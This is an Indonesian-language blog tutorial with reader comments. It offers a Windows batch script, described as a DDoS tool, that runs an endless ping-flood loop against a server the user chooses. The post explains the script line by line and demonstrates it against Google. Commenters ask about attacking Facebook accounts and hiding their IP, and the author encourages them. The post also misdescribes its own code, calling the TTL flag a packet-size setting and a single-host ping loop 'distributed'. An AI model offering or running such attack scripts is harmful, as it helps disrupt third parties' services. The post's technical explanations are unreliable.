Cara Mudah Membuat Serangan DDOS dengan Notepad tutor gambar new post 2012








Di sini aku cuma mau berbagi ilmu dengan kalian cara membuat
aplikasi DDOS(Distributed Denial of Service)dengan bantuan BatchFile.Berserta penjelasan
dari source code ini.

---------------
Tahap pembuatan
---------------

Yang di perlukan dalam pembuatan ini adalah
1.Notepad
2.salin script ini ke notepad

view plain print?
  1. @echo off  
  2. mode 67,16  
  3. title DDOS Attack  
  4. color 0a  
  5. cls  
  6. echo.  
  7. echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
  8. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ  
  9. echo DDOS With Batchfile  
  10. echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
  11. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ  
  12. echo.  
  13. set /p x=Server-Target:  
  14. echo.  
  15. echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
  16. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ  
  17. ping %x%  
  18. echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
  19. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ  
  20. @ping.exe 127.0.0.1 -n 5 -w 1000 > nul  
  21. goto Next  
  22. :Next  
  23. echo.  
  24. echo.  
  25. echo.  
  26. set /p m=ip Host:  
  27. echo.  
  28. set /p n=Packet Size:  
  29. echo.  
  30. :DDOS  
  31. color 0c  
  32. echo Attacking Server %m%  
  33. ping %m% -i %n% -t >nul  
  34. goto DDOS  

3.save dengan ekstensi batchfile 
contoh:DDOS.bat

----------
Cara Pakai
----------

Pada menu Server-Target masukan
alamat web yang ingin di DDOS
contohnya seperti ini:



















disini saya mencoba meng DDOS Google,setelah itu
tekan "ENTER" hasil seperti ini :



















kemudian masukan hasil ip dari ping tadi di ip host dan
untuk Packet Size itu untuk mengirim berapa byte jadi
ukuran Size terserah anda
contohnya seperti ini :




















ke mudian tekan "ENTER" hasil seperti ini :






















jika seperti gambar di atas berarti Proses DDOS berhasil di jalankan
tergantung anda ingin men DDOS sampai berapa lama.

-----------
Penjelasan
-----------

ok saya akan memberi sedikit penjelasan source code :

@echo off

view plain print?
  1. *Menyebabkan perintah tidak ditampilkan 
  2. ketika dilaksakan/di execute  

mode 67,16
view plain print?
  1. *Membentuk layar pada command prompt 
  2. dengann ukuran lebar "67" dah tinggi "16"  

Title DDOS Attack

view plainprint?
  1. *membuat judul dengan nama ""  
color 0a  
view plain print?
  1. *membuat layar berwarna,  
  2. pada angka 0->untuk membuat background 
  3. Hitam dan a->untuk membuat tulisan menjadi
  4. Hijau Terang  
cls

view plain print ?
  1. *membersihkan layar sehingga command seperti   
  2.   
  3. @echo off  
  4. mode 67,16  
  5. title DDOS Attack  
  6. color 0a  
  7. tidak di tampilkan  
echo
view plain print?
  1. *akan menampilkan baris kosong  
echo
view plain print?
  1. *untuk memberi tanda longkap  

Ä
view plain print?
  1. * membuat garis lurus  

echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo DDOS With Batchfile
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.


set /p x=Server-Target:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


view plain print?
  1. *artinya hasil dari "Server-Target:" 
  2. akan di nyatakan x  
  3. setelah itu x akan di Ping  


@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next


view plain print?
  1. *memberi waktu pause sebanyak 5 second dan 
  2. diteruskan ke Next  


:Next
echo.
echo.
echo.
set /p y=ip Host:
echo.
set /p z=Packet Size:
echo.

view plain print?
  1. *setelah ke Next ,  
  2. pada "ip Host:" akan di nyatakan y dan 
  3. "Packet Size:" akan di nyatakan z  
  4. setelah itu di teruskan ke DDOS  
:DDOS

color 0c
view plain print?
  1. *membuat warna merah terang  

echo Attacking Server %y%

ping %y%-i %z% -t >nul
goto DDOS
view plain print?
  1. *artinya setelah memasukan nilai y dan nilai z   
  2. hasil nilai y akan di tampung di %y%  
  3. dan penge PING an nilai y dan pengiriman size yg
  4. di yatakan pada  
  5. nilai z setelah berhasil di lanjutkan ke :DDOS  
  6. karena mengunakan goto(perulangan)  
Artikel Dilindungi
Sertakan alamat blog ini jika mengcopy paste
Jika tidak kami Laporkan (Hak Cipta Dilindungi)



Terima Kasih
Rafi Orilya Groups
by Rafi Aldiansyah Asikin

27 komentar

  1. thanks gan ane sekarang bisa....

    BalasHapus
  2. ini gimana ngetesnya? nyang di DDos itu yang server target apa ip host'nya?? maaf sya baru belajar

    BalasHapus
  3. Gan, mau ikutan cyber ane gk?

    BalasHapus
  4. Wah bermanfaat banget mas.. ane nyoba ah hehe

    BalasHapus
  5. Maaf Newbie gan....kalau buat ke notepad gimana cara jalaninnya yah?makasih

    BalasHapus
  6. Whats your email / contact ? reply to [email protected]
    Thanks.

    BalasHapus
  7. gan, ini bisa gak gan buat DDOS akun facebook?

    BalasHapus
    Balasan
    1. waduh agan ini mantap banget tujuannya :D ahaha.. coba saja dah

      Hapus
  8. Saya masih bingung gan ... Itu yg memasaukan 100000 byte nya dimana???

    BalasHapus
  9. kan itu udah tertulis 1000 mas di scriptnya :)

    BalasHapus
  10. Balasan
    1. Silahkan gan, jangan lupa sertakan link sumbernya :)

      Hapus
  11. Gan gimana caranya kasih gambar aplikasinya,kan dah di save dengan ---.bat lalu jadi kayak aplikasi tapi gimana kasih gambar aplikasinya gan....sekian terima kasih gan

    BalasHapus
  12. Gan ko setelah saya klik file bat nya masuk DDOS tapi jalan sendiri dan gak muncul tuh proses DDOS nya? Maaf bang masih newbie
    L

    BalasHapus
  13. Bisa dicoba dengan OS windows 7 gan

    BalasHapus
  14. apa kah kalo kita melakukan ini apa kah ip kita ngak bakal ketahuan maaf masih belajar soal nya

    BalasHapus
  15. ini harus terkoneksi sama internet kah

    BalasHapus
  16. Archon 427 : kemungkinan bisa juga dapat tercatat dan harus menggunakan koneksi internet.
    Putra Pc : itu pake CMD gan, kalau pakai app bisa cari di google yang terbaru

    BalasHapus

Komentar anda sangat dibutuhkan bagi kemajuan kami untuk terus berkarya.
Diharapkan :
* Berkomentarlah dengan bahasa yang baik
* Tidak ada unsur SARA, SPAM, PORNO
* Tidak merugikan orang lain
* Menunjukkan identitas yang jelas bukan Anonim

Diperkenankan :
* Komentar promosi link web anda
* Kritik & Saran

[Protected] by DMCA Protection Pro™
EmoticonEmoticon